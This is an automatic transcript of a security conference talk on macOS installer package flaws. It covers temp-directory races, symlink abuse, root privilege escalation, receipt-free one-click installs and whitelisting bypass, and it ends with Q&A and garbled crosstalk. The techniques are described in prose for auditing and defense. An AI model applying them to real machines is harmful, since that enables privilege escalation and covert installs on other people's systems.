system, it's game over. - Okay, awesome, thanks. - Thank you very much. Enjoy the rest of the conference and conferences. If anyone wants M&Ms that are not yellow, pardon? Yeah, yeah, sure, sure. Let me just pack this. Hi, Pavel, nice to meet you. They literally know the other ones. I even forgot to put that in. I would expect it to be like the EXE itself, to have the hash of the file. And when it runs, it just does even an MD5 check. I think if it's within... Even if it's within... It should be within the exe. It's not in the exe. You literally bypass. But the problem is that if it's in the exe, then you won't be able to change it

without changing the exe. You want the whole thing. Yes. Yeah. What's your connection with the exe? Yeah, because Spotify is installing more apps and more desktops than Slack. A lot of people talk about Slack, but there's also other similar collaboration tools. Yes. I use it so now I'm scared. Yeah, that's actually the one for tomorrow.

- I guess it's also . So they are creating their own browsers. I'm not sure if they're doing it right. Yeah probably like yeah but... I don't know. Yeah yeah. But don't you feel like you evolved to some kind of leader and then just drag the shadows?

Yes. Yeah.

um

- I feel like now I have to keep it going forever because it's been a year. I also didn't do it yet. Yeah.

We have to about that. All right. And this is actually, turn this thing off. I am carrying my bag. So here we go. Maybe, do you have another one of these? Maybe just play point adapter? If so, maybe try your adapter. That's a likely point of failure. Although I think this thing is fine. I've used it recently. Yeah, this I'd like to get sorted out. Yeah. Yep. All right. Well. You want a slideshow that's not full screen. I don't think it's going to let you do that.

But if we have to, if we have to switch over and have it just like how you had it with that split screen, that doesn't look bad either. Thank you. Thank you. So it's going to be running in the background. Which is what everyone said. Right, right, yes, yes. But especially at a hacking conference. So at this point, one thing I might do actually, let me try to, I've never done this before, but I think it might be a good charge in a formal area today.

- Oh yeah yeah totally right. So what we could do is shrink these down. I don't know if this is gonna be let's make the version. So here I did it like this, and then come up now. So I have it here, and then we'll have over those raw signals. So they'll be yeah it's about as good as we want. - One of the criticism, basically at ERP is going like something feeds an output to you, or you see some input. Check, check, one, two, one, two. Check, check, one, two. Check, one, two, one, two. One, two, three, four. Mic check, one, two. One, two, three, four. Check, one, two. One, two, three, four. Check

one two. Check one two.

Were you just button mashing to bring it down? No, I used manual. Check one two, one two, one two, check, check, check. Press manual, and then it'll give you control. But it's a broken command. Check one two, one two. So here's max. I see where we're at. So here's maximum. That'll bring it up all the way. And I do agree, it would be nice to have the cameras up for the whole thing. See if there's a notch between where you were and where we were. Sure, absolutely. So that's max. This apparently is max. So now if I go to max, it's still bad. Killing the fluorescence. Check one, two. Hey Ben. Yeah. With the lights on, it's not bad.

- It's not that bad? - Let's look at it, yeah. - So Peter, this is having like a super weird delay, like after you put the mic down, I put the earbuds in and I heard you get a checkpoint too. - You're listening to the live stream. You're listening to the live stream. - Okay. - I don't think that'll matter to anyone here. - So I need to come back to, I think we're, yeah, I can't. - Close up.

This is just a very easy thing to never see something.

Come walking up over here. I was going to ask you, it's Bluetooth, right? Yeah. It's going to be noisier. So what happens if we lose a signal? Will it come back? Do you have to? So that's why I'm afraid of getting to you. So here, let's do this instead. You're in it. Okay. It's not the same. Okay. And I want to grab like a chair. No. So here's an example of that. Okay. So go back. Go back. Go back one more. So at this point, I'm still in the app. But while you're doing that, I'm taking this off. You're not taking it off.

Well, you know what I can do also is I can walk out a few feet, and he can then zoom in on me, and then I can do again. I can walk up or something. As soon as we get this slide right here, talk about it, but also, you know, I mean, it's really, you know, so it's front and center. Okay. Because then the actual device, which looks good. Okay. And I mean, I'm going to go put some citations in. And your mic is hot. That's right, I can't just project that far. Hello. Thank you. If I stand here and talk, that sounds good. Awesome. Awesome. I'm going to stomp all over these cables. Hello.

Great. Yeah.

Good afternoon everyone and welcome to B-Sides Las Vegas breaking ground track. This talk is given by Andy Grant. and it's unpacking macOS installer packages. But before we get started, we want to thank our sponsors, including Valamail. That's how you say it. It's Valamail, not Valley Mail. I got confirmation on that. And Amazon, Blackberry, NSA, and Microsoft, along with our volunteers who helped make this go. This track and talk is being recorded and streamed, so we ask that you put your cell phones away and on silent, and we'll let Andy get started. Thanks. Thank you. Yeah, so I'm going to be talking about packages, specifically Apple macOS installer packages and some security flaws on them. So first, a little

bit about me. I've been doing offensive security professionally for 11 years. I've been doing security as a hobby since my early days, 20 plus years ago. Started out self-taught, just playing with computers, trying to figure out what was going on. Led me to pursuing a computer science degree at Stanford. right out of undergraduate, joins ISEC Partners, a security consulting firm, got to do some penetration testing. Then that got acquired by NCC Group. I stuck around and I'm still with NCC Group. My professional career has been very application security focused, ranging from web apps, mobile apps, native apps, and things that get installed. Over that time I did five years as a security consultant doing all

different manners of the ranks there. Then I decided I'd try my hand at management, become a vice president, manage a team of 30 people. And for those five years I spent most of my time trying to figure out how I could make an excuse for me to be back on the projects that my team was supposed to be delivering. So I gave up management and I'm back doing the technical work and what I love. But this is a quick version about me. I'm better known amongst the world by my hacker alias, Dana Vollmer's husband. My wife is an Olympian. I get known as a plus one everywhere I go. You can read all about it with a little bit of Googling. And yes, I do find time off to

support her and her goals. We're going to talk about why I did this research, how it came about. We're going to look inside the package. We're going to look how do you get inside of it and audit it, and then what can and what have I seen go wrong with these installer packages. So first, why was I doing this? Well, I've got trust issues. I don't like computers just doing things for me. I like to understand what they're doing. I don't trust the software that comes with them or the packages down or they're in a debug mode that is incompatible with our systems and whatnot. So we try to get creative. Sometimes all you have is the installation process to look at and provide the

client value. So you figure out ways to do that. So now we're going to look at the package, get into the technical bits here. So these are full technical name Mac OS X installer flat packages. They have the PKG extension. They came about around 2007 with OS X 10.5. There's little to no official documentation provided by Apple on what's inside these. They have tools for building these. They used to have better tools for building these, and actual UI tools. Now it's sort of undocumented outside of man files, command line tools. There are some good unofficial documentation out there, but it's fairly incomplete. There's parts of the package that are completely undocumented across these, but you can find out bits and pieces and

piece things together by poking around or by opening them up yourself. It's a flat package. It's a single file. Specifically, it's an extensible archive or a czar. Before the flat packages came about, you had bundle packages that were used. These are very similar to the .app application bundles you'll find, which really are just a folder that Apple, that OS X knows how to open and look at. And you used to be able to just browse inside the folder, look inside, see what was going on before running the installer. Now it became a little bit of an obscure archive type, and it became less obvious of how to look at that. There are some tools provided.

Your Apple laptop comes pre-installed with something called Package Util, very handy tool that will allow you to look at packages and edit and modify packages. There's also some third-party tools out there. Suspicious Baskets is one specifically to look at, sort of what I'm talking about. It shows you the signing certificate, the files that are going to be installed, and does some sort of checks on what may or may not be the norm for an installer. It rarely flags true security issues in my experience, but it does give you something of like, hey, there might be something worth digging inside. Plus it has some extra tabs to look at the files and the scripts that are

run by the installer, which we're going to get into those in a bit. So package util, this is a snippet from the man page. It's provided by Apple to query and manipulate the installer packages and the receipts. The receipts are the system record of what has gone through the macOS installer and what files it has left behind on your system. That's a very handy thing to poke around with. Here's just a small snapshot of the commands you can use. Looking at the receipt package database, you can look at the packages that have been installed, the files by those packages. You can do it in different formats, see what volume of your system, what drive of your system it was installed on, and the target directory those files were placed

into. When you do files, it just lists them relative to the package, not where they are in your file system. So you have to clobber that together with some of the package info stuff of this was installed to this location, and then you go back to the list of files and you can see where all those files were placed. Then you can also mess with the packages and expand a package and flatten a package or flatten into a package. But so let's take a look inside. So to unpack it, the easy way, use the provided tool. You just give it the expand command, give it the package, give it a non-existent directory. It will create

that directory, extract the files into it, and you can go about browsing those. But, you know, that's the easy way. We're here to be hackers, to not trust the provided tools. So I can go create the directory I want to, change into that directory, and then use the czar command to extract the package. I do the create directory and change into directory because czar doesn't support an output directory, and so it just clutters the current working directory, so you want to get into a clean working environment before you go through. So inside the package you'll typically find a distribution file which is an XML file, a resource directory which has all manners of different images, licenses, readmes, backgrounds.

Then you'll have typically one or more package directories. These directories contain the bill of materials or the list of all files that are installed, the package info, another XML file, and then payload and scripts which are further compressed archives that sound really interesting. So let's dig into these files a little bit. For the distribution file, it's XML and it can contain JavaScript. So the XML is defining the title that will be displayed in the installer, the welcome text, the readme, the background image, the little logo on there. It defines whether you need to do nothing, restart, or shut down your system after the installation is complete. And then it can contain scripts that are triggered by installer checks. So you can define an installer check,

and installer check references a JavaScript function that is then defined within script tags within the XML document. It uses a subset of JavaScript called installer.js. Apple does provide documentation on that. Package info, another XML file, easy to read, look at, contains sort of meta information about the package, the installation requirements, how many files are being installed, what's the total number of bytes being installed. It also defines where the files are going to be installed and what permission level the installer needs to run. It will also include paths to scripts that need to be run pre-installation and post-installation.

You have the bill of materials. This is, like I was saying, the list of all files to be installed, update, or removed from the system. It includes the file permissions, the owner group, and the size and creation time and all that normal file system information for each of the files. The payload, this is where we're getting into more interesting stuff. The payload, the files that are actually going to be installed. This is actually a CPIO archive that is then gzip compressed. This is the archive that contains all of those files called out in the BOM. It is what gets extracted into your file system at the location that package info specifies, the install location. This

is just the installation part of the process. It's an extracting of an archive onto your system. There's nothing more fancy than that that really goes on as far as the files that get placed on the system. You can also have an optional scripts archive. This is the same as payload CPIO archive that's been gzip compressed. You have pre and post installation scripts and additional resources. It can really contain anything. It's an archive. You can put whatever you want in it. I've seen README files that were then pulled out and referenced by the distribution instead of being in the resource file. You can see some of the payload files for whatever reason being in here. Anything you want your scripts to be able to directly interact with should be

in this archive. The scripts can be bash, python, pearl, those are the most common. But really the only requirement for it is that it has to be executable and has to have an appropriate shebang. This archive, when the installer is running, is extracted to a random directory, a temporary directory that's not predictable. So it's not really something you can mess with unless you sort of pause the installer, don't click the next buttons, and then look at the run environment and find where that directory is, and then you can go look at what got extracted. Or, you can open it up yourself. You already extracted the larger package. Let's look inside this gzip CPIO file. So, the long way to do this is you can cat the contents

of the archive into gzip to decompress it and pipe that into CPIO saying it's taking input and it'll dump right into the current working directory all the contents of that archive. But CPIO actually natively automatically recognizes gzip compressed files, and so if you just send the archive directly into it, it'll extract right into the current working directory. However, if you did this through the easy way initially using package-util-expand, this was all done for you and instead of the scripts object being inside the directory that was created, being an archive, it is already a folder and that folder contains the contents of the scripts archive. There is no actual scripts archive if you do the expand

command. Payload, same as scripts, skip right to using CPIO. Sometimes the payload contains further packages, and so you recurse through this process, expanding all the packages, opening all the script files, finding everything that you may want to audit or look at for security issues. However, you're blowing up all these files. If it's a big application, you may be worried about your disk space. So you can check out the BOM, which, like I said, lists out everything. Run lsbom, and it will just list out all the files. And then you can look through and see if there's anything you feel like may be worth opening up the package to extract and look at. Unlike scripts, if you use package util expand,

this does not automatically expand payload. You do have to go in and manual extract this if you want to get the files out without running through installer. Okay, so what happens when we double click this package and installer launches? well rough order of execution things we care about here what gets executed on the system it parses the distribution file if it's present it checks the for installation checks looks to see if there's any scripts to call calls that javascript function defined within distribution executes through that to that function can call further functions and whatnot as long as they're all defined there within the distribution file Then you click next in the going through your installer, you get to the pre-installation

phase. This happens pre-extracting the payload archive onto your file system. If the package info defines the pre-install file, it goes, this path is relative to the script archive. It goes in, pulls out that, extracts the scripts, executes the pre-install file, and moves on to extracting the payload. Payload is extracted into the install location as specified in the package info. And then we move into the post install phase. If there's any post install scripts defined, it goes through and opens and executes those files. So now we get into the fun bits. What can go wrong here? Well, so the interesting parts, the scripts that get executed and the files that get written to your file system. So, with scripts, you got

the pre-install, the post-install, they can contain other scripts, like I was saying, that can be called from pre-install, post-install. Look at them, audit them, read the bash scripts, read the Perl, Python scripts, normal mistakes people will make in those, we'll talk about the specifics in just a bit. Or the payload archive may actually have its own scripts that are easy to audit. I like the scripts. It's a text file. They're easy to look at. So you can find uninstall scripts, various debugging or help scripts that get written with the application. Or you can go look at native applications and those issues, brush up on your reverse engineering and debugging skills. You got the binaries, you got the kernel modules, you got the libraries right there. You can go open

those up, look at what's going on from a non-runtime environment. And since before it ever gets installed on your system, just place there within a directory of your choosing. So the types of issues that I was encountering and I'm going to talk about are largely talked to. Time of check to time of use. Except almost all of these happen without any check. They just go and use assuming the files are safe and ready. Most of this happens within the temp directory. So they make assumptions that anything I put in temp is safe to read or safe to write to or safe to execute. Fun thing about Temp is anybody can write to it. It's world

writable. Yes, once you write to it, generally your permissions are locked and other people can't write to those, but you have to make sure that you were the first one to write there, hence the "Talk to." Plus, I've seen people going, just granting 777 file permissions read, write, execute access to everybody on the system for the files they place around on either in the temp directory or in the application directory or in application support in the libraries. It gets kind of messy. So now we're going to look at real issues and real packages that I've seen in the past eight months. So we're going to look at a normal user to root privilege escalation, some symbolic link

abuses, privilege escalation from any user on the system to the current running user, arbitrary directory deletions, and arbitrary code execution. The first one, here you have A normal user launches this installer. When the installer runs and it doesn't require root privileges, it can go drop this installer util file into the temp directory as the current user, and then it goes and tries to do root privilege actions in the post install that triggers installer to say I need to run it with administrative privileges. You'll see the prompt enter administrative username and password. And so the catch here is user install util is owned by the current user. But that user may not be the person who

had the password to do sudo actions, to do administrative actions on this. Say it's your corporate laptop, you want to install a video conferencing file, you know it has this vulnerability here, and so you ask your IT to go and install this package for you. They're going to type in their username and password for you to allow it to install. But behind the scenes, you're waiting while that file doesn't exist, do nothing. Once it does exist, delete it, copy your exploit into that location, and then you wait for the post install to go and call it with root privileges. And on your local system, the person installing it just escalated up to administrative to root privileges on this laptop.

The next issue, symbolic link abuse, is twofold here. In the preinstall, it tries to do some cleanup. It wipes away this NS installation file. And then during the post installation, earlier in here, it's written some stuff to that file. And it changes the permissions on that to 777. And then it changes the owner to the current user of that file. The fun thing here is any user on this system can preemptively wait, create that file so that when this gets removed, you're sitting there waiting for it. So while that file exists, do nothing, then the pre-install triggers, that file no longer exists, so we move into here, we create our symbolic link to applications, and it's pointing to that file. So the change permissions will follow that symbolic

link, and since it's with root privileges, it will change /applications to now be world writable by anybody on the system. And then it will also change the owner of it to the current user installing the file. So this just grants any user any process on the system the ability to go install anything that they would like in the applications. You could have done that since it's not recursive. I didn't choose /etc because then it doesn't make all files there world writable. It's not -r. But I can now go and install different applications in there, which can lead me to compromising other users once they go about executing the applications I've put on there.

A regular privilege exclusion. This is running as the vulnerability is in the pre-installation. It again tries to do some little cleanup stuff saying, oh, sometimes I place a 7-zip file if this installer had been run previously. remove the 7-zip file, go through and unzip the 7-zip package that we brought in with us in our payload and output it into the /stemp directory, then go through and execute that file to extract some more stuff into the directory we're going to put the file contents. So any user, any process can attack the installing user on this. Notice nothing's running as root here, so we're not gaining root privileges on this system, but it's very easy. I copy my exploit into the directory before this installer is

ever run. This is owned by the attacker, which since this is not root, it can't delete it. It can't overwrite it, but it sure as heck can execute it. And so, no check to make sure that the appropriate owner of the 7-zip file was what this installer expected it to be. And so, if that file exists, it can't delete it, it can't overwrite it, it still exists there and it'll happily go through and execute it with the current installer installing user's privileges.

Another one, this happens outside of the installation scripts. Like I said, in payload, it might have other scripts that get run. At some point during this application's lifestyle, it calls out to a script that got installed through the payload. It does a little cleanup of stuff. So it was populating this directory with some debugging information. And then it goes through and cleans up when it's done with this script. It does a recursive remove of SDU slash star and remove dir SDU slash. So, the way symbolic links work on the Apple system is the slash, it'll follow the symbolic link. So, we're not running with root privileges, so our attack has to be, they have to be deleting something that they have permissions to delete. So, you

pick their home directory, create the symbolic link before the script ever runs with the application. The slash star will put a slash there, star, which puts us into the victim's directory. It follows through. delete every file in their system directory recursively, forced, no prompt. And then remove directory with the slash will actually follow the symbolic link. If you don't have the slash here, it tries to remove the symbolic link. The symbolic link is in a directory, it fails out. You put the slash there, follows the symbolic link, and now you just blew away their actual home directory as well as all the files in it. And you have a symbolic link left around that points

to nothing. Then we get to arbitrary code execution or arbitrary installation on this. So in the package info, this package defines an installation location, meaning that its payload is going to extract all of its contents into the temp directory, razor synapse. It's going to do it with root privileges, And so in the post install it goes into that directory, it looks for all the package files, and then for each package file it finds, it installs that package. This, running it from the command line like this, doesn't pop up the UI, skips all user interaction, and just force installs it with our root privileges. So, install location when you're extracting this payload, it doesn't care if that directory already

exists. So you can go ahead and pre-create that directory. It's going to put whatever package files you want in it, and it'll be your package files, and it'll happily go through and find all of them for you. This has been fixed, and so... We're going to demo it. We're going to look at this. We're going to go through the whole process I just talked about. We're going to download a package. We're going to open up that package, look at the files inside, check the distribution file for installer checks, go through, find the vulnerability, create our exploit for this, execute that exploit. So here we go. Go download it. It looks like I'm downloading it from their real website, but I

actually hijacked this DNS and used a vulnerable package since, like I said, they had fixed this. So we go, create our directory, we extract the file, and now we're inside the distribution file. So we extracted the file, opened up the distribution file, and now we're looking for here, okay, is there any installation checks? That's mainly what I was concerned about when looking at these. Nothing really fancy going on in here. Great. we'll go through we'll go into the package file look at the files now we're going to look at the package info file okay so we have the package info file we see that install location that it's running with root we also can note

that after installation it's going to require us to restart you can see here when i was saying it has like the number of bytes installed the number of files that it installs and the script that runs after the payload is extracted Great. Let's go look at those. So now we're going to extract the scripts file. First we make our directory so we don't clutter where we're currently working. Extract the scripts. Look at what's in there. And now we're going to open up the, this is the post install. And we're going to look through the file, the code, looking for anything of interest. Go through. Here's our vulnerable bit that we're going to play with. and so now we'll want to go through and create

our malicious payload and to do that we're going to switch to our attacker mallory and she's going to go through and develop this exploit for us so first we have to create the directory we're going to write our script into because we want to have some script run create our script We're just going to do a simple shell file. We're going to touch a file in the temp directory to prove that we ran. We'll date it. We'll show what user we ran with what privileges. And no exploit is completed without popping calc, so we'll pop calc at the end. Now we make that file executable. This is not executable. It doesn't work. And then we

use package build to create the package that we'll then put into the temporary directory.

So here you can give an identifier. If you don't give an identifier, it automatically creates an identifier for you. But for our purposes right now, this isn't very important. We specify that there's no payload, that there's no files we're installing here. So don't worry about trying to make the payload archive. And then we specify here is the scripts that to make the script archive. We just give it the directory. It'll archive up everything in there. Package got... got created, we're gonna create the directory and move our payload into that directory. Great, now we just wait for somebody to come along and run the installer for us. So Bob is gonna be here and install the

package, go through, he's not an administrator so we need Alice to come in and type her in a password for us. She's gonna go, run, there's our calc pop, and then we go look and confirm that we ran with root privileges. So that is start to finish, downloading a package, opening up a package, looking at all the different parts of it, seeing a vulnerable part of the scripts, creating a payload that exploits it, and waiting for the installer to take place and go on. So while looking at these installers, I noticed some things that were unexpected. Some I sort of hypothesized myself, some I saw in the packages going on. But so that no payload package that I demonstrated there, it leaves no receipt. Remember I talked about

receipts at the very beginning here. So the receipt is the package identifier. You can look up all the package identifiers that have been installed in your system. And then it's also the files that were installed there. If you don't install any files, it doesn't record your package identifier and it doesn't record any files because you didn't install any. So there's no record of that payload executing. Whereas there is record of that razor package executing on the system. and all of its subparts with their identifiers. Also for fun, you can pull this out of the pre-installation scripts and put it into the distribution install checks where you're supposed to be checking system compatibility and instead execute everything right there. It's basically a one-click install and we'll

take a peek at that. So here we're going to look at the packages on our system. So this is just Scrolled off the screen all the packages that are installed on here at the if you scroll to the top There's a lot of Apple packages. You can actually look at what came installed on the system via the installer so we're going to actually Try to look to see are there any NCC packages installed here. There aren't any cool So now we're going to show that I pre-created a payload directory, and now we're going to build a package with a NCC group identifier, so it will show up in our list. This is where I say, this is sort of the create payload command. This is our payload's

root directory. And then I'm going to say the installation is the temp directory NCC group, create our package, run the package, go through, install, great, look at the files there. things were installed and then we'll go and look and confirm that there is now a receipt of that we installed on the system. You could also then do package util -- files, give this identifier and it would list out foo bar as the files that were installed. So now we're going to go through and create a no payload file. And I'm going to do it through the distributions installation check. So I want to create the CPIO gzipped archive payload and include it in our scripts

folder because I want everything to be able to be contained within the scripts since I'm not doing a payload file. So now I'm going to go look at this script I have. This script is pretty straightforward. I define an application directory, the same one we were just installing into. I clean it up. I remake the directory. I copy the payload. When you're in your scripts, all your paths are relative to the script archive. And so I copy the payload into that directory and then go into that directory, extract the payload, and then remove the package. The -d here just means create any necessary folders and directories as you go, sort of like -p and make dir. And then I get fancy and I kill the installer because we're done.

This is all I wanted to do. I wanted to install my payload. I don't need the installer process anymore. Go ahead and kill it. So let's go look at that distribution file. Here's the title that I'm going to have show. Here's a package of reference identifier. And then I say I allow external scripts. That means I can now do system.run and call things in the script archive. So now I have this installation script, install check, looks for the script definition that's defined here, it does system.run, like I said, system.run can only do files that are in resource directory or in the script archive. That's the script we had already looked at. Now we're going to go build our package. When you do a package build, it doesn't actually

include a distribution file. That's for product build. But product build expects you then to embed a package in there. Gets all complicated. So I'm going to create a package, a no payload package with that script. I'm going to extract to that package, copy my distribution file in there, and then flatten that package back up. So now I created the package so the installer will understand it. I then extracted the information from it, copied my distribution file into there, and then I'm going to say, please go flatten that back up. It'll pull the script archive back into the CPIO archive and then put the whole package back into XR format. Now I'm going to run this payload. That was it. My payload just got installed.

We can go back for those that might not have been paying attention. It happens really fast. There it is. The moment I click that, the installation, so that pop-up says you're going to run an installation check. And then it goes, and that installation check was run the pre-install script. And then that script extracts the payload and kills the installer. And that's why it disappears the moment I click that continue button. Everything just got installed successfully. You can go look at that. It's all relative to when I did the find command. It was package slash payload slash the files in there. Now we're going to go look. And it's still just that first payload. There is no record that I just

installed these files on the system. I bypassed the system's record of my installer running, but I still got to do everything I did. Plus, I didn't have to type in an administrative password. And so I skip that step. One-click install after the installer's opened up. Super user-friendly. Super kind of weird. And so that is that. You can go do a bit more with package installers and it gets sort of fun when you start to play around. The fantastic people over at Proterian did a two-part blog post about using installer to bypass application whitelisting on OS X, specifically Google Santa, which is one of the better known, better used application whitelisting programs. The way it works, it works at the execv

level and installer, the binary is whitelisted. So it's basically at the binary level. You can't do it at process level or whatnot. It's things that gets executed. So everything that runs in installer checks, everything that runs in those pre and post installer scripts runs as part of the installer binary, the installer process, which is whitelisted. So You can use this install checks with the kill installer to make a one-click payload that bypasses Google's Santa, the application whitelisting. Fun for red teaming, which is what they talk about, how they use it. Obviously not fun for anything but testing. That covers Mac OSS installer packages and things you can find with them.

I knew everybody was going to have a lot of questions, so I sped through that. So we got like 10 minutes for questions. I saw a hand pop up over here. I believe we have a microphone, unless you feel like you got a booming voice. Well, let's find out. What about the audit daemon that runs on Mac OS X? So I think the OpenBSM audit daemon. Would it capture your actions? The audit daemon? Like Gatekeeper? No. Oh. I didn't play with audit D. So... So some of those actions, obviously if I'm touching places that it's monitoring stuff, it'll still trigger. But if it doesn't, whitelist installer as installer can do whatever it wants. And that's

sort of the flaw that happened with Google Santa was it's sort of limited in what it can or can't allow and deny. And so it has to allow installer because that's the expected use. And so anything that installer does is approved by the whitelisting. Right, yeah, it would allow the... the process or the execv without the context of it's doing something. Right. So yeah, I wonder, yeah, audit usually, I think it gets most system calls, so, and they tie into an EDR. It does, it captures everything. Okay, yeah. But nobody reads it, so. Yeah, yeah, so there's probably some logs that you can go and audit and look at. I don't know, maybe OS query

can have a one worked on it or something and be pulled into some central logging. Thanks. Yeah. There was also a leapfrog back, yes. Hey, thank you very much. How often do you come across packages that don't execute as root? Because that seems to be the default that I see. And then it was weird seeing the pseudo in the scripts because they always inherit it. Yeah, so that was an interesting thing in my auditing. Everything seems to install. If you notice, when I did sort of my demo of the this will leave a receipt, and I was just right into the temp directory, it actually required me to enter an administrative password. There is not

a way to build just a package that doesn't require root. So I could have gone in, manually edited that package info file, removed the auth from root to none, and then it wouldn't have prompted for that. Or when you do product build and do a proper distribution file, you can set the permissions. But most people just inherit the default. Everybody expects to have to run as... as an administrator when you install anything. And so even if you don't need the administrative powers when you're installing, like you're installing to the user's local application directory, it still writes it with root privileges. Over here. - Yeah, do you see a lot of this being used in malicious software and

red team testing? I mean, how much do you see this in the wild? - So, see it in the wild, all the time, at least six times in eight months. But as far as maliciously in the wild, I haven't known malware to do this. It is much more of the red teaming process. The Praetorian blog post talks greatly about why they chose this route. One of the key parts about doing a red team is it has to be within the user's expected norm on the system to fly under the radar. Installing something is very much part of the expected norm. They even went so far as getting a proper Apple developer certificate and they signed their package. If you had downloaded this and it was

unsigned, you would have to go in and click in system directories, you know, install anyways, which is outside the user's norm for most people. And so it's not hard to get that developer's certificate. It's not hard to sign it and then just have it emailed around and whatnot. Here, because I built them locally and just ran them locally, I don't get those alerts or concerns. But if they had been tainted through coming down through the browser, they would have been

Well actually, so building off of that, I have seen the install during the installer checks in the distribution file, that one-click install, in the wild, but not maliciously. It was for user's experience. It just has the side effect of bypassing the receipt, but it is that one-click install. You instantaneously got your application installed and everything. But this would be really good for like a supply chain attack. Right, yeah. I have a quick comment. Jaron Bradley at RSA this year used the installers to bypass SIP by predicting those temp directories that they create that you mentioned. Okay, yeah, those temp directories I didn't want to go through the effort of seeing if they were predictable, but that's awesome that he was able to predict them because it

is one of those like slash temps, temp dot blah blah blah blah blah garbage seeming stuff and so. Oh nice. Yeah, because I would imagine if you could sort of hijack the location that's going to be, you can do some of these sim link attacks and same things. Up front.

Hi, with relation to the privilege escalation that you showed, isn't this kind of like the, what do you call it, the security off trampoline all over again? Yeah, it is sort of just hijacking the users already offed, or basically throwing up the prompt. Particularly the escalation, I don't know if you're talking about up to root or the other one. Up to root, yeah. Yeah, this one, you know, I could also create my own installer that will give me root privileges and then go, hey, IT admin, I'm installing video conferencing software. Can you come type in your password? It works better if I just say, here's my laptop. Could you install the video conferencing software? Because I know I could, in

the background, be doing this. But yeah, it is very similar to those types of attacks. All right, thank you.

During your exploration of the package format and the specification, did you find any built-in mechanisms for developers to use update mechanisms? Was that something they had to hand-jam themselves? If so, is that some form or vector for persistence or privilege escalation? This way you don't have to potentially know beforehand whether or not a package should be installed or be used within the organization. Yeah, you can, in the package info and in the distribution, you can specify whether this is an update. And then a lot of the time the way I saw developers doing this was in the pre-install they would check does this file pre-exist and then check the version of it and whatnot. But you can also include that in the package info that this is this version.

If this version exists run these commands. Otherwise run these commands. And then the BOM it's not just the files that are being written. It also can specify this is being updated or these files are being removed. So the The package installer flow does support the update, but I do see more of the custom code written in the installer scripts of, hey, this exists, blow away the directory, recreate it, copy the new files over, sort of their own self-cleanup. Do you think this stuff might be going away with Catalina, or do you see this staying around because it's really the only way to install stuff? I'm surprised how often I still saw this package install for files that were just writing to the applications directory because everybody has migrated

towards the DMG volume drag and drop to the shortcut that's already in there. And so why go through this whole installation flow? I mean, that bypasses the whole receipt system also. There still isn't a good flow outside of this for getting things into application support kernel modules, libraries. And so that's why you see Razor was a great example here is because they're going through and installing mouse drivers on your system. You don't want those in slash applications. You need those tucked away in the application support directories. And so installer is really the only way right now to do that. It will be interesting as SIP migrates deeper into rootless, migrates deeper into the Mac OS environment and see if they start having

to have some installer privilege escalation or some other bypass to further lock these things down and restrict it to app store only files type thing. In terms of like remediating this sort of thing, is it, Oh, okay. Thanks. Sorry. So in terms of like remediating this sort of thing and potentially identifying packages that are tampered with, is it basically checksums of files that Blue Team would have to deal with, or do you have other recommendations? Yeah, so there are signature checks. So if we go all the way back to suspicious package, you can see that, or package util actually has a dash dash file. checks signature or signature dash check and then you give the package file and it will check

what it does. So you can see that this was signed by, there's the command line ways to look at it. So you can check to see is this signed by the company, the developer that I expect it to be and then you know either they did something bad or malicious intentionally, accidentally. or it's been tampered with, even if it's got a valid signature, but it's not signed by the developer you're expecting, that would throw up a flag for me. So the Protarian people had a valid signature, but I don't expect my video conferencing file to come from Protarian. If I did, I'm just asking for trouble. But then there's also, then for most of these, they're not, I don't have to tamper with the package. The package comes pre-vulnerable.

And so it's more of like the protections as a developer is to do those checks. Check to see that when you go to do this, a lot of these, you know, they try to write a file, but I already wrote that file and so it fails. but they don't check the result of their directory create or their file create, and so it just continues on. Those commands fail, but since they're sort of in a batch mode inside this installer script, the installer happily continues through failures until if the last command fails, then the script fails. But as long as there's more commands to run, it's whatever the last exit code was and determines whether it

was a success or failure. So you can do those checks, capture the return result of make dir, or before you go use a file, check that it is the user you expect to own it. And then you know that at the very least, only that user could be attacking you in this and not just any system or process on their pre-wrote that file. Way in the back. Audit D might be capturing those it sounds like now that there might be but I when trying to build my own package and debug why I was failing I was having a very hard time finding a place and I had to do a whole bunch of touch and output to temp directories after every

single command so I know where I got to within my script because I couldn't find a place like in the console logs or anything that was showing me that and I am at zero minutes left on my time, supposedly. But actually, I think I have five more minutes. I've short-sheeted myself. There is time. That's five minutes of applause, people. Thank you. I think we got four and a half minutes. How about this now, with one hand? How are you doing? Good. Good to see you. Same. You're back in the game. Yeah. Yeah. So since March, I went. So every five years per ISAC law and the dust grandfathered in, I get a five week sabbatical. So I basically set it up so when I returned

from my sabbatical in March, I was out of the management game and I have zero direct reports and I do strategic project delivery, which is like M&A's, high profile clients, like new logos that we really want to impress, or like we really messed up. Or it's like a super likely Goat app and I can have like five intern shadows or something. Thank you very much. Thank you. You're in Tokyo now? Last I heard you were still with VMware but not with the old department. So that was months, years? We left. What? We left. We didn't film the video. That's right. We'll do that later. Where's the connection? Here, here, here. Here's the microphone. The microphone.

I think I could exploit that. By the way, I have a blackboard of Spider-Man. I didn't see if that's where he is. - No, Synapse 2, it's fixed, it's the latest package, they now know ahead of time all the files. They still do start off with . But then they say if it's not in our predefined list of packages, don't execute it. - Okay, so that's good. But the software is . - Okay, I mean, to do this research, it's basically combed from - Test, test, yeah. Yes please. um Focused on security. I knew about this mortgage and I wanted to make it secure. You've seen them, right? Yeah. I gave you that part when I was a courtier

and then did a company for 15 years. I knew I wanted to pursue that. I was doing my website challenges and sharing shelves for my home directory, for my home system to other people. So basically what you just said was true. curious during that time Because people are like, oh, a package. Double-click it. And I'm like, oh, a package. Is that an archive? Can I look at it from a different way? Oh, a docx file? That really is it. I know it's a great XML file. It's basically the same idea. I use that, not this. But you get sort of freebies there when you're poking around and stuff. I think we're going to put you up.

- I think they would've moved. - I think we can talk more. So, um, - So that, um, checks all checks for ABI students, for that, um, so I can charge that student a second amount, but actually, I've done that. So, yeah, I could put it in something like a new order. - It's like at the no point, you know, the time, so it like, holds for the time. - Yeah, so that, um, got me bored to, you know, the check to see if it's, Good afternoon and welcome to B-Sides Las Vegas: Breaking Ground Track. We have Ezra and Guy going to give a talk on using machines to exploit machines, harnessing AI to accelerate

